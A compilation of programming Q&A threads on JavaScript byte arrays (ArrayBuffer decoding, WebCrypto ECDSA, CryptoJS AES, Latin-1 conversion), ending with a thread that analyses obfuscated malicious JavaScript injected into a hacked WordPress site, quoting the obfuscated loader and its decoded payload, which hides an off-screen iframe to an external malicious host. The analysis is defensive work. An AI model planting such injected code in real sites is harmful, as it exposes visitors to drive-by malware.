reading content of arraybuffer in javascript send via server (file reader api) - javascript

When I am sending blob to server
but when i am sending it back to client using emit() of socketio library it is converted to ArrayBuffer(2563)
[[Int8Array]]
:
Int8Array(2563) [100, 105, 115, 116, 114, 105, 98, 117, 116, 105, 111, 110, 32, 118, 115, 32, 118, 97, 114, 97, 98, 108, 105, 116, 121, 32, 32, 111, 114, 32, 115, 116, 97, 110, 100, 97, 114, 100, 32, 100, 101, 118, 105, 97, 116, 105, 111, 110, 13, 10, 13, 10, 13, 10, 115, 99, 97, 108, 101, 32, 111, 102, 32, 115, 99, 97, 116, 116, 101, 114, 32, 112, 108, 111, 116, 13, 10, 108, 105, 110, 110, 101, 114, 32, 112, 97, 116, 116, 101, 114, 32, 111, 102, 32, 108, 105, 110, 101, 32, 105, …]
[[Uint8Array]]
:
Uint8Array(2563) [100, 105, 115, 116, 114, 105, 98, 117, 116, 105, 111, 110, 32, 118, 115, 32, 118, 97, 114, 97, 98, 108, 105, 116, 121, 32, 32, 111, 114, 32, 115, 116, 97, 110, 100, 97, 114, 100, 32, 100, 101, 118, 105, 97, 116, 105, 111, 110, 13, 10, 13, 10, 13, 10, 115, 99, 97, 108, 101, 32, 111, 102, 32, 115, 99, 97, 116, 116, 101, 114, 32, 112, 108, 111, 116, 13, 10, 108, 105, 110, 110, 101, 114, 32, 112, 97, 116, 116, 101, 114, 32, 111, 102, 32, 108, 105, 110, 101, 32, 105, …]
byteLength
:
(...)
I have upload text file send to server and in console this was file return by server, so how to read the file content, I have used filereader API and converted it to blob and then server has send it to me as arraybuffer.
when file was in file I was able to read its content directly on client side
when I send it to server in python the blob file I was able to read it too, by print but when it was send back to client arraybuffer, I don't know how to view its content.


You can make a Blob from an ArrayBuffer, you can then run that Blob through FileReader to get the text
var blob = new Blob([yourArrayBuffer]);
var reader = new FileReader();
reader.onloadend = function(){
console.log("text: ",reader.result);
};
reader.readAsText(blob);

Related

How to verify an ES256 (ECDSA using P-256 and SHA-256) signature with window.crypto.subtle?

I'm having trouble figuring out the right parameters to verify a SHA-256 signature that was created with an ECDSA P-256 public key in web crypto. Below script outputs:
Node verify result: true
Web verify result: false
What are the parameters to make verification work with web crypto too? I think I've tried everything by now except the right thing :|
(BTW tried the web piece in Chrome as well with same result)
const crypto = require("crypto");
const webcrypto = require("node:crypto").webcrypto;
const derEncodedPublicKey = Buffer.from(
"MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE5/J6xKyJxzOJ85om+jUJUFHMqnpruqXnKx5jKRojB3E1gC29g/kAc6xHunY05IW+gn2oeAdjggnH7a4WQ8/Afg==",
"base64"
);
const data = new Uint8Array([
73, 150, 13, 229, 136, 14, 140, 104, 116, 52, 23, 15, 100, 118, 96, 91, 143,
228, 174, 185, 162, 134, 50, 199, 153, 92, 243, 186, 131, 29, 151, 99, 5, 0,
0, 0, 0, 182, 173, 217, 158, 122, 216, 45, 140, 214, 44, 204, 209, 62, 118,
45, 12, 238, 10, 91, 88, 80, 235, 131, 5, 70, 171, 245, 252, 71, 13, 207, 235,
]);
const sig = new Uint8Array([
48, 68, 2, 32, 58, 26, 13, 251, 116, 195, 219, 77, 90, 1, 64, 38, 54, 249, 56,
87, 235, 24, 78, 26, 13, 88, 74, 224, 159, 58, 159, 133, 111, 98, 69, 214, 2,
32, 87, 1, 32, 191, 170, 10, 33, 204, 86, 124, 73, 21, 153, 4, 58, 182, 248,
175, 144, 80, 146, 173, 247, 205, 36, 51, 59, 221, 212, 133, 107, 118,
]);
function nodeVerify() {
const nodeKey = crypto.createPublicKey({
format: "der",
key: derEncodedPublicKey,
type: "spki",
});
const v = crypto.createVerify("SHA256").update(data);
return v.verify(nodeKey, sig);
}
async function webVerify() {
const webkey = await webcrypto.subtle.importKey(
"spki",
derEncodedPublicKey,
{
name: "ECDSA",
namedCurve: "P-256",
},
false,
["verify"]
);
return webcrypto.subtle.verify(
{
name: "ECDSA",
hash: "SHA-256",
},
webkey,
sig,
data
);
}
(async () => {
console.log("Node verify result:", nodeVerify());
console.log("Web verify result:", await webVerify());
})().catch(console.error);
NodeJS is easier, it needs less parameters :)
Thank you.

After more googling and trying I found the answer: the ECDSA signature that I am using, is actually an ASN.1 encoded structure. NodeJS is fine with that during verification, however webcrypto not--it wants the raw signature, which is the byte concatenation of the 2 integers in the ASN.1 encoded signature.
More information in this post: https://crypto.stackexchange.com/questions/57731/ecdsa-signature-rs-to-asn1-der-encoding-question

ICryptoTransform decryptor C# equivalent in reactjs

I am migrating from .net core to reactjs and need to Decrypt Hash to object. I stuck here where results are not equal. Here is the code of .net.
Note: cipherText length is 656 I can't paste such a long array here.
byte[] cipherText = [132, 185, 138, 129, 38, 216, 49, 48, 25, 139, 187, 146, 67, 234, 194, 143, 252, 214, 245, 230, 30, 238, 235, 53, 155, 136, 0, 112, 76, 27, 205, 84, 124, 250, 74, 114, 208, 227, 148, 135, 112, 168, 171, 73, 45, 122, 31, 248, 186, 80, 148, 143, 251, 216, 90, 152, 138, 130, 148, 199, 178, 151, 151, 195, 252, 43, 67, 183, 45, 24, 228, 73, 208, 249, 155, 36, 78, 232, 210, 20, 235, 109, 206, 245, 180, 28, 227, 32, 202, 143, 255, 110, 128, 38, 101, 174, 253, 80, 171, 201......]
plaintext = null;
byte[] Key = [56, 63, 82, 186, 73, 8, 112, 110, 129, 185, 157, 192, 163, 160, 120, 215, 52, 254, 252, 189, 25, 82, 43, 15, 87, 98, 48, 193, 21, 44, 6, 163]0: 561: 632: 823: 1864: 735: 86: 1127: 1108: 1299: 18510: 15711: 19212: 16313: 16014: 12015: 21516: 5217: 25418: 25219: 18920: 2521: 8222: 4323: 1524: 8725: 9826: 4827: 19328: 2129: 4430: 631: 163];
byte[] IV = [200, 97, 110, 6, 23, 248, 144, 210, 223, 167, 67, 64, 125, 96, 136, 201]
using (AesManaged aesAlg = new AesManaged())
{
aesAlg.Key = Key;
aesAlg.IV = IV;
ICryptoTransform decryptor = aesAlg.CreateDecryptor(aesAlg.Key, aesAlg.IV);
using (MemoryStream msDecrypt = new MemoryStream(cipherText))
{
using (CryptoStream csDecrypt = new CryptoStream(msDecrypt, decryptor, CryptoStreamMode.Read))
{
using (StreamReader srDecrypt = new StreamReader(csDecrypt))
{
plaintext = srDecrypt.ReadToEnd();
}
}
}
}
How can I decrypt byte array with cryptojs?

I solved it, Here is the solution:
var strHexWA = (CryptoJS.lib.WordArray.create(new Uint8Array(cipherText)));
var KeyWA = (CryptoJS.lib.WordArray.create(new Uint8Array(Key)));
var IVWA = (CryptoJS.lib.WordArray.create(new Uint8Array(IV)));
var decrypt = CryptoJS.AES.decrypt({
ciphertext: strHexWA
}, KeyWA, {
iv: IVWA,
padding: CryptoJS.pad.Pkcs7,
mode: CryptoJS.mode.CBC
});
var plaintext = decrypt.toString(CryptoJS.enc.Utf8);
return plaintext;

Cannot save to Firestore array of integers and floats

I am using Firestore to save an array of integers and floats.
However, Firestore wont allow me to save that array and does not return an error (in the catch statement for example)
My array is the size of 71201
(71201) [84, 96, 96, 96, 91.8, 97, 98, 98, 98, 99, 99, 99, 99, 99, 98, 98, 98, 98, 98, 98, 98, 96, 95, 93, 91, 89, 88, 87, 87, 87, 88, 89, 91, 94, 96, 98, 99, 100, 101, 101, 101, 98, 96, 92, 89, 87, 87, 87, 87, 89, 91, 93, 95, 96, 97, 98, 98, 99, 99, 100, 100, 100, 100, 100, 100, 101, 102, 103, 104, 105, 106, 108, 109, 110, 111, 113, 113, 114, 115, 116, 117, 117, 118, 118, 119, 120, 120, 121, 122, 122, 122, 123, 124, 124, 125, 126, 127, 127, 127, 127, …]
Reading the limit documentation the size of an integer is 8 Bytes
So trying to do some math here (and possibly failing)
71201*8/1024 =
556.2578125
So that is ~556KB
That as I understand is not a problem with the limit.
Also I can only imagine that this is the problem (not accepting this large array) due to the network tab view:
Opening one of the requests looks like this on the headers:
and the response is always empty
The catch statement of the promise does not get called and I have waited for many minutes (neither the then)
this.afs.collection('events').doc(event.getID()).set({values: test}).then((some) => {
debugger;
}).catch((e) => {
debugger;
});
Any ideas what can I be doing wrong?
P.S. It's been now about 20minutes and my network tab keeps growing with those failed requests.
UPDATE
If I Make this array a string via eg JSON.stringify then the operation saves within seconds.

Convert a variable containing UTF8 string to a variable containing latin1 string - for browser in Javascript

Bash alternative (shell set to UTF8):
Input:
in.json
$ file -I in.json
in.json: text/plain; charset=utf-8
{"it-it":"Città"}
Bash command I need the JS alternative for:
$ iconv -f utf8 -t latin1 in.json > out.json
out.json
$ file -I in.json
out.json: text/plain; charset=iso-8859-1
{"it-it":"Citt?"}
What Javascript sees in browser for in.json when read as base64 from an input type="file" (despite content-type and script encoding set to utf8):
{"it-it":"Città"}
What Javascript sees in browser for out.json:
{"it-it":"Città"}
Question - how can I make in the most native Javascript way to make most modern browsers convert this utf8 string
({"it-it":"Città "} as latin1 and {"it-it":"Città"} as utf8)
to a latin1 string?
I prefer a native solution, or worst case JQuery, please try not to solve it with an npm + node dependency hell.
P.s.: I only need to support the most modern browsers, this is for an admin-only page.

Below I've created an array with iso-8859-1version of CittÃ, and then used TextDecoder to decode it,.
So if you can get the binary version of the JSON, this should be able to convert for you.
//CittÃ
var latinSource = new Uint8Array([67, 105, 116, 116, 195]);
var tc = new TextDecoder("iso-8859-1");
console.log(tc.decode(latinSource));

For me, 'new TextDecoder("iso-8859-1")' not working...
1.
var latinSource = new Uint8Array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255]);
var tc = new TextDecoder("iso-8859-1");
console.log(tc.decode(latinSource)); //return windows-1252 string
I see, the result, it's not a latin1 string, because this contains character '€'.
2.
//windows-1252
console.log('new TextDecoder("iso-8859-1")', new TextDecoder("iso-8859-1"));
// ---->
//new TextDecoder("iso-8859-1") {
// "encoding": "windows-1252",
// "fatal": false,
// "ignoreBOM": false,
// "decode": function decode() { [native code] }
//}
Working way to encode-decode latin-1:
//Decode Latin1-string (iso-8859-1 encoded string) -> into Uint8Array
function Latin1ToUint8Array(iso_8859_1){
var uInt8Arr = new Uint8Array(iso_8859_1.length);
for(var i=0; i<iso_8859_1.length; i++){
uInt8Arr[i] = iso_8859_1.charCodeAt(i);
}
return uInt8Arr;
}
//encode Uint8Array -> into iso-8859-1 encoded string (latin1-string)
function Uint8ToLatin1Str(Uint8Arr){
var iso_8859_1_string = '';
for(var i=0; i<Uint8Arr.length; i++){iso_8859_1_string+= String.fromCharCode(Uint8Arr[i]);}
return iso_8859_1_string;
}
var latinSource = new Uint8Array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255]);
console.log( Uint8ToLatin1Str(latinSource) ); //valid latin1-string (iso-8859-1)
Finally, Windows-1252 conversions:
function Windows1252EncodeDecode(
cp1252 //string (to encode into bytes), or Uint8Array (to decode into string)
){
var replaceCharCodesForLatin1 = {
//_______________________________________________________________________
//|"windows-1252"| iso-8859-1 | //Unicode |
//|'character' | charcode, | //charcode(commented), |
//|______________|______________________|_______________________________|
'€' : 128, //8364,
'‚' : 130, //8218,
'ƒ' : 131, //402,
'„' : 132, //8222,
'…' : 133, //8230,
'†' : 134, //8224,
'‡' : 135, //8225,
'ˆ' : 136, //710,
'‰' : 137, //8240,
'Š' : 138, //352,
'‹' : 139, //8249,
'Œ' : 140, //338,
'Ž' : 142, //381,
'‘' : 145, //8216,
'’' : 146, //8217,
'“' : 147, //8220,
'”' : 148, //8221,
'•' : 149, //8226,
'–' : 150, //8211,
'—' : 151, //8212,
'˜' : 152, //732,
'™' : 153, //8482,
'š' : 154, //353,
'›' : 155, //8250,
'œ' : 156, //339,
'ž' : 158, //382,
'Ÿ' : 159, //376
};
if(typeof cp1252 === 'string'){ //if that was been string to encode to bytes
var resultUint8 = new Uint8Array(cp1252.length);
for(var i = 0; i<cp1252.length; i++){
var charCode = cp1252[i].charCodeAt(0);
resultUint8[i] = ((charCode>256) ? replaceCharCodesForLatin1[cp1252[i]] : charCode);
}
return resultUint8; //return Uint8Array
}else if(cp1252 instanceof Uint8Array){ //else if that was been Uint8Array to decode to string
var resultString = "";
for(var i = 0; i<cp1252.length; i++){
var charCode = (Object.keys(replaceCharCodesForLatin1).find(key => replaceCharCodesForLatin1[key] === cp1252[i]));
charCode = (typeof charCode === 'undefined') ? String.fromCharCode(cp1252[i]) : charCode;
resultString += charCode;
}
return resultString; //return Uint8Array
}
}
var latinSource = new Uint8Array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255]);
var windows1252 = new TextDecoder("iso-8859-1").decode(latinSource); //windows-1252 string on output
console.log('new TextDecoder("iso-8859-1").decode(latinSource)', (new TextDecoder("iso-8859-1").decode(latinSource)))
var bytesBack = Windows1252EncodeDecode(windows1252);
console.log('bytesBack', bytesBack.toString());
var Windows1252StringBack = Windows1252EncodeDecode(bytesBack)
console.log('string back', Windows1252StringBack);
console.log('Compare with TextDecoder', (Windows1252StringBack === windows1252 ));
Modification of latin-1 functions, from 3:
function isLatin1String(str){return (str.match(/[^\u0000-\u00FF]/) === null);} //check is string "iso-8859-1"-encoded or not (true/false)
//Decode Latin1 or utf-8 string -> into Uint8Array
function StringToUint8Array(str){
if(!isLatin1String(str)){
return new TextEncoder("utf-8").encode(str); //encode to bytes as utf-8
}
//else, as ASCII-compatible latin1-string
var uInt8Arr = new Uint8Array(str.length);
for(var i=0; i<str.length; i++){
uInt8Arr[i] = str.charCodeAt(i);
}
return uInt8Arr;
}
//encode Uint8Array -> to latin1-string
function Uint8ToStr(Uint8Arr){
var iso_8859_1_string = '';
for(var i=0; i<Uint8Arr.length; i++){iso_8859_1_string+= String.fromCharCode(Uint8Arr[i]);}
return iso_8859_1_string;
}
function latin1ToUtf8(latin1str){
return new TextDecoder("utf-8").decode(StringToUint8Array(latin1str));
}
console.log('StringToUint8Array("CittÃ")', StringToUint8Array("CittÃ")); //Latin1
console.log('StringToUint8Array("Città€")', StringToUint8Array("Città€")); //utf-8
console.log('Uint8ToStr(StringToUint8Array("CittÃ"))', Uint8ToStr(StringToUint8Array("CittÃ"))); //latin1
console.log('Uint8ToStr(StringToUint8Array("Città"))', Uint8ToStr(StringToUint8Array("Città€"))); //utf-8
console.log('latin1ToUtf8(Uint8ToStr(StringToUint8Array("Città€")))', latin1ToUtf8(Uint8ToStr(StringToUint8Array("Città€")))); //utf-8

javascript injected into site hack

My friends word press site was attacked and a bunch of php files injected with some eval statements, which i've inflated and decoded, but it has lead me to the below javascript.
Anyone any ideas how to deobfuscate this so we can read what it says?
ww=window;v="v"+"al";if(ww.document)try{document.body=12;}catch(gdsgsdg){asd=0;try{d=document}catch(agdsg){asd=1;}if(!asd){w={a:ww}.a;v="e".concat(v);}}e=w[v];if(1){f=new Array(102,116,108,96,116,104,109,107,32,102,112,94,40,96,42,95,41,122,112,98,116,116,112,107,32,76,95,113,104,45,100,105,111,110,112,37,77,96,114,101,46,113,95,107,100,110,107,37,41,41,38,95,45,96,41,46,41,40,41,94,59,124,11,7,102,116,108,96,116,104,109,107,32,113,113,37,41,122,112,98,116,116,112,107,32,76,95,113,104,45,112,94,110,99,109,106,40,40,44,113,111,82,114,111,105,109,101,37,51,53,39,43,115,116,96,112,116,113,103,107,103,39,51,38,59,124,11,7,105,101,38,107,97,117,103,100,97,115,109,111,46,98,109,108,107,104,99,66,110,96,96,105,101,99,39,120,13,9,7,115,97,113,30,112,116,109,107,58,114,114,38,38,59,12,8,6,118,96,112,29,117,96,30,58,32,109,95,115,105,102,95,113,111,113,44,114,115,100,112,62,103,100,108,113,59,12,8,6,118,96,112,29,117,113,106,29,61,31,98,108,99,116,107,98,110,115,44,105,111,98,95,113,105,110,108,43,104,113,99,99,59,12,8,6,105,101,38,114,114,107,44,102,110,99,99,117,79,101,38,36,97,99,107,102,110,38,39,58,61,44,47,29,38,37,30,114,97,45,103,107,100,100,118,76,102,39,37,84,105,109,98,108,119,114,37,38,33,60,43,46,32,37,36,29,40,116,95,43,105,109,98,98,120,78,100,37,39,76,81,70,69,38,39,30,61,44,47,121,124,116,95,43,105,109,98,98,120,78,100,37,39,78,110,98,114,96,37,38,33,60,43,46,41,40,121,10,10,8,7,97,111,98,115,106,101,109,114,43,119,113,103,113,101,39,37,57,115,115,119,105,101,61,44,112,39,42,113,113,110,108,41,36,32,122,30,109,111,114,103,113,105,110,108,55,97,97,113,108,108,116,114,98,59,31,106,98,102,115,56,42,39,42,101,111,97,39,52,45,48,43,47,45,48,47,39,40,39,111,118,56,32,115,109,109,58,44,37,40,103,113,95,37,54,47,46,41,49,47,46,45,41,42,37,109,120,58,30,122,60,46,113,113,121,107,99,59,32,59,98,102,118,31,97,105,97,114,113,58,34,114,37,40,115,115,108,106,43,38,32,59,60,104,100,111,97,108,99,29,115,113,97,58,34,103,114,113,112,57,45,44,112,116,106,105,100,110,117,107,108,96,119,112,46,104,108,99,111,46,95,97,47,101,99,98,100,45,110,101,112,33,30,116,105,99,114,101,61,33,37,40,103,113,95,37,51,47,46,41,54,47,46,38,43,38,32,29,104,100,103,100,104,115,59,31,39,42,101,111,97,39,49,45,48,43,52,45,48,40,41,36,34,61,58,44,105,101,112,94,109,100,60,57,47,99,103,115,62,38,39,56,13,9,7,122,13,9,7,115,97,113,30,98,120,111,59,107,101,118,30,65,97,115,99,37,41,58,99,117,112,45,113,98,116,67,95,113,101,39,99,117,112,45,101,98,116,67,95,113,101,39,39,40,55,40,57,10,10,8,103,99,40,99,109,96,117,108,99,107,116,45,97,108,111,106,103,98,46,104,108,97,101,119,77,99,40,38,93,92,117,115,107,99,114,60,37,38,61,60,43,46,41,122,98,108,99,116,107,98,110,115,44,96,111,110,105,102,101,60,37,92,95,116,114,106,102,113,59,36,43,113,113,37,41,42,37,56,32,100,118,109,105,113,99,112,61,38,41,98,120,111,44,113,111,70,75,81,83,115,112,102,110,102,38,38,43,38,57,29,112,96,114,101,61,46,37,56,125,12,8,122);}w=f;s=[];for(i=0;-i+800!=0;i+=1){j=i;if((031==0x19))if(e)s=s+String.fromCharCode((1*w[j]+e("j%4")));}xz=e;try{document.body++}catch(gdsgd){xz(s)}

The hidden code is this:
function gra(a,b){return Math.floor(Math.random()*(b-a+1))+a;}
function rs(){return Math.random().toString(36).substring(5);}
if(navigator.cookieEnabled){
var stnm=rs();
var ua = navigator.userAgent;
var url = document.location.href;
if(url.indexOf('admin')==-1 && ua.indexOf('Windows')!=-1 && (ua.indexOf('MSIE')!=-1||ua.indexOf('Opera')!=-1)){
document.write('<style>.s'+stnm+' { position:absolute; left:-'+gra(600,1000)+'px; top:-'+gra(600,1000)+'px; }</style> <div class="s'+stnm+'"><iframe src="http://xxxxxxxxxxxx.info/ad/feed.php" width="'+gra(300,600)+'" height="'+gra(300,600)+'"></iframe></div>');
}
var exp=new Date();exp.setDate(exp.getDate()+7);
if(document.cookie.indexOf('__utmfr=')==-1){document.cookie='__utmfr='+rs()+'; expires='+exp.toGMTString()+'; path=/';}
}
It's stored in the f array as simple ascii, but every four characters are incremented by 0, 1, 2, and 3 repeatedly in a simple attempt to obfuscate the code.
Looks like this adds a bit of code to every webpage to display a malicious url in an i-frame.

First, feed it through http://jsbeautifier.org/.
You now can easily deduce that v becomes the string "eval", and e is the eval function. Also, you can run the loop that builds the string from the array items to see what is does:
function gra(a,b){return Math.floor(Math.random()*(b-a+1))+a;}
function rs(){return Math.random().toString(36).substring(5);}
if(navigator.cookieEnabled){
var stnm=rs();
var ua = navigator.userAgent;
var url = document.location.href;
if(url.indexOf('admin')==-1 && ua.indexOf('Windows')!=-1 && (ua.indexOf('MSIE')!=-1||ua.indexOf('Opera')!=-1)){
document.write('<style>.s'+stnm+' { position:absolute; left:-'+gra(600,1000)+'px; top:-'+gra(600,1000)+'px; }</style> <div class="s'+stnm+'"><iframe src="http://pulldownlays.info/ad/feed.php" width="'+gra(300,600)+'" height="'+gra(300,600)+'"></iframe></div>');
}
var exp=new Date();exp.setDate(exp.getDate()+7);
if(document.cookie.indexOf('__utmfr=')==-1){document.cookie='__utmfr='+rs()+'; expires='+exp.toGMTString()+'; path=/';}
}
Now it is quite obvious: It sets a random identifier cookie, and for every IE/Opera user on Windows who does not browse an "admin" url, it creates an iframe which is positioned off-screen. The iframe likely contains some drive-by-download of malware.

I just pasted this into http://jsbeautifier.org/... Good luck!
ww = window;
v = "v" + "al";
if (ww.document) try {
document.body = 12;
} catch (gdsgsdg) {
asd = 0;
try {
d = document
} catch (agdsg) {
asd = 1;
}
if (!asd) {
w = {
a: ww
}.a;
v = "e".concat(v);
}
}
e = w[v];
if (1) {
f = new Array(102, 116, 108, 96, 116, 104, 109, 107, 32, 102, 112, 94, 40, 96, 42, 95, 41, 122, 112, 98, 116, 116, 112, 107, 32, 76, 95, 113, 104, 45, 100, 105, 111, 110, 112, 37, 77, 96, 114, 101, 46, 113, 95, 107, 100, 110, 107, 37, 41, 41, 38, 95, 45, 96, 41, 46, 41, 40, 41, 94, 59, 124, 11, 7, 102, 116, 108, 96, 116, 104, 109, 107, 32, 113, 113, 37, 41, 122, 112, 98, 116, 116, 112, 107, 32, 76, 95, 113, 104, 45, 112, 94, 110, 99, 109, 106, 40, 40, 44, 113, 111, 82, 114, 111, 105, 109, 101, 37, 51, 53, 39, 43, 115, 116, 96, 112, 116, 113, 103, 107, 103, 39, 51, 38, 59, 124, 11, 7, 105, 101, 38, 107, 97, 117, 103, 100, 97, 115, 109, 111, 46, 98, 109, 108, 107, 104, 99, 66, 110, 96, 96, 105, 101, 99, 39, 120, 13, 9, 7, 115, 97, 113, 30, 112, 116, 109, 107, 58, 114, 114, 38, 38, 59, 12, 8, 6, 118, 96, 112, 29, 117, 96, 30, 58, 32, 109, 95, 115, 105, 102, 95, 113, 111, 113, 44, 114, 115, 100, 112, 62, 103, 100, 108, 113, 59, 12, 8, 6, 118, 96, 112, 29, 117, 113, 106, 29, 61, 31, 98, 108, 99, 116, 107, 98, 110, 115, 44, 105, 111, 98, 95, 113, 105, 110, 108, 43, 104, 113, 99, 99, 59, 12, 8, 6, 105, 101, 38, 114, 114, 107, 44, 102, 110, 99, 99, 117, 79, 101, 38, 36, 97, 99, 107, 102, 110, 38, 39, 58, 61, 44, 47, 29, 38, 37, 30, 114, 97, 45, 103, 107, 100, 100, 118, 76, 102, 39, 37, 84, 105, 109, 98, 108, 119, 114, 37, 38, 33, 60, 43, 46, 32, 37, 36, 29, 40, 116, 95, 43, 105, 109, 98, 98, 120, 78, 100, 37, 39, 76, 81, 70, 69, 38, 39, 30, 61, 44, 47, 121, 124, 116, 95, 43, 105, 109, 98, 98, 120, 78, 100, 37, 39, 78, 110, 98, 114, 96, 37, 38, 33, 60, 43, 46, 41, 40, 121, 10, 10, 8, 7, 97, 111, 98, 115, 106, 101, 109, 114, 43, 119, 113, 103, 113, 101, 39, 37, 57, 115, 115, 119, 105, 101, 61, 44, 112, 39, 42, 113, 113, 110, 108, 41, 36, 32, 122, 30, 109, 111, 114, 103, 113, 105, 110, 108, 55, 97, 97, 113, 108, 108, 116, 114, 98, 59, 31, 106, 98, 102, 115, 56, 42, 39, 42, 101, 111, 97, 39, 52, 45, 48, 43, 47, 45, 48, 47, 39, 40, 39, 111, 118, 56, 32, 115, 109, 109, 58, 44, 37, 40, 103, 113, 95, 37, 54, 47, 46, 41, 49, 47, 46, 45, 41, 42, 37, 109, 120, 58, 30, 122, 60, 46, 113, 113, 121, 107, 99, 59, 32, 59, 98, 102, 118, 31, 97, 105, 97, 114, 113, 58, 34, 114, 37, 40, 115, 115, 108, 106, 43, 38, 32, 59, 60, 104, 100, 111, 97, 108, 99, 29, 115, 113, 97, 58, 34, 103, 114, 113, 112, 57, 45, 44, 112, 116, 106, 105, 100, 110, 117, 107, 108, 96, 119, 112, 46, 104, 108, 99, 111, 46, 95, 97, 47, 101, 99, 98, 100, 45, 110, 101, 112, 33, 30, 116, 105, 99, 114, 101, 61, 33, 37, 40, 103, 113, 95, 37, 51, 47, 46, 41, 54, 47, 46, 38, 43, 38, 32, 29, 104, 100, 103, 100, 104, 115, 59, 31, 39, 42, 101, 111, 97, 39, 49, 45, 48, 43, 52, 45, 48, 40, 41, 36, 34, 61, 58, 44, 105, 101, 112, 94, 109, 100, 60, 57, 47, 99, 103, 115, 62, 38, 39, 56, 13, 9, 7, 122, 13, 9, 7, 115, 97, 113, 30, 98, 120, 111, 59, 107, 101, 118, 30, 65, 97, 115, 99, 37, 41, 58, 99, 117, 112, 45, 113, 98, 116, 67, 95, 113, 101, 39, 99, 117, 112, 45, 101, 98, 116, 67, 95, 113, 101, 39, 39, 40, 55, 40, 57, 10, 10, 8, 103, 99, 40, 99, 109, 96, 117, 108, 99, 107, 116, 45, 97, 108, 111, 106, 103, 98, 46, 104, 108, 97, 101, 119, 77, 99, 40, 38, 93, 92, 117, 115, 107, 99, 114, 60, 37, 38, 61, 60, 43, 46, 41, 122, 98, 108, 99, 116, 107, 98, 110, 115, 44, 96, 111, 110, 105, 102, 101, 60, 37, 92, 95, 116, 114, 106, 102, 113, 59, 36, 43, 113, 113, 37, 41, 42, 37, 56, 32, 100, 118, 109, 105, 113, 99, 112, 61, 38, 41, 98, 120, 111, 44, 113, 111, 70, 75, 81, 83, 115, 112, 102, 110, 102, 38, 38, 43, 38, 57, 29, 112, 96, 114, 101, 61, 46, 37, 56, 125, 12, 8, 122);
}
w = f;
s = [];
for (i = 0; - i + 800 != 0; i += 1) {
j = i;
